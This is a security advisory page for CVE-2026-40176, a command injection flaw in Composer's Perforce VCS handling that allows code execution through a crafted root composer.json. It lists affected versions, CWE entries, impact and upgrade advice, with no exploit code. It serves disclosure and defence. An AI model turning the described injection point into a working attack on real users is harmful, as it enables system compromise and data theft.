CVE-2026-40176
Received Received - Intake
Command Injection in Composer Perforce VCS Leads to RCE

Publication date: 2026-04-15

Last updated on: 2026-04-25

Assigner: GitHub, Inc.

Description
Composer is a dependency manager for PHP. Versions 1.0 through 2.2.26 and 2.3 through 2.9.5 contain a command injection vulnerability in the Perforce::generateP4Command() method, which constructs shell commands by interpolating user-supplied Perforce connection parameters (port, user, client) without proper escaping. An attacker can inject arbitrary commands through these values in a malicious composer.json declaring a Perforce VCS repository, leading to command execution in the context of the user running Composer, even if Perforce is not installed. VCS repositories are only loaded from the root composer.json or the composer config directory, so this cannot be exploited through composer.json files of packages installed as dependencies. Users are at risk if they run Composer commands on untrusted projects with attacker-supplied composer.json files. This issue has been fixed in Composer 2.2.27 (2.2 LTS) and 2.9.6 (mainline).
CVSS Scores
EPSS Scores
Probability:
Percentile:
Meta Information
Published
2026-04-15
Last Modified
2026-04-25
Generated
2026-06-16
AI Q&A
2026-04-16
EPSS Evaluated
2026-06-15
NVD
CVE-2026-40176
Affected Vendors & Products
Showing 2 associated CPEs
Vendor Product Version / Range
getcomposer composer From 1.0.0 (inc) to 2.2.26 (inc)
getcomposer composer From 2.3.0 (inc) to 2.9.5 (inc)
Helpful Resources
Exploitability
CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-20 The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.
CWE-78 The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.
Attack-Flow Graph
AI Quick Actions
Instant insights powered by AI
Executive Summary

This vulnerability exists in Composer, a dependency manager for PHP, specifically in versions 1.0 through 2.2.26 and 2.3 through 2.9.5. It is a command injection flaw in the Perforce::generateP4Command() method, which builds shell commands by inserting user-supplied Perforce connection parameters (such as port, user, and client) without properly escaping them.

An attacker can exploit this by crafting a malicious composer.json file that declares a Perforce VCS repository with specially crafted parameters. This allows the attacker to inject and execute arbitrary commands on the system running Composer, even if Perforce itself is not installed.

The vulnerability can only be exploited if Composer commands are run on untrusted projects containing attacker-controlled composer.json files, as VCS repositories are only loaded from the root composer.json or the composer config directory, not from dependencies' composer.json files.

This issue has been fixed in Composer versions 2.2.27 (2.2 LTS) and 2.9.6 (mainline).

Impact Analysis

This vulnerability can lead to arbitrary command execution on the system running Composer. An attacker who supplies a malicious composer.json file can execute commands with the privileges of the user running Composer.

  • Potential unauthorized access or control over the affected system.
  • Execution of malicious code, which could lead to data theft, system compromise, or further attacks.
  • Disruption of normal operations due to unauthorized commands.

Users are at risk if they run Composer commands on projects with untrusted or attacker-supplied composer.json files.

Mitigation Strategies

To mitigate this vulnerability, immediately upgrade Composer to version 2.2.27 (2.2 LTS) or 2.9.6 (mainline) or later, where the issue has been fixed.

Avoid running Composer commands on untrusted projects or with attacker-supplied composer.json files, especially those declaring Perforce VCS repositories.

Compliance Impact

The vulnerability allows an attacker to execute arbitrary commands in the context of the user running Composer by injecting malicious commands through Perforce connection parameters in a composer.json file. This could lead to unauthorized access, data manipulation, or data exfiltration.

Such unauthorized command execution and potential data compromise could impact compliance with standards and regulations like GDPR and HIPAA, which require protection of personal and sensitive data against unauthorized access and breaches.

However, the provided information does not explicitly describe the direct effects on compliance or specific regulatory impacts.

Chat Assistant
Ask questions about this CVE
Hi! I’m here to help you understand CVE-2026-40176. Ask me anything about the vulnerability, its impact, or mitigation strategies.
0/70
EPSS Chart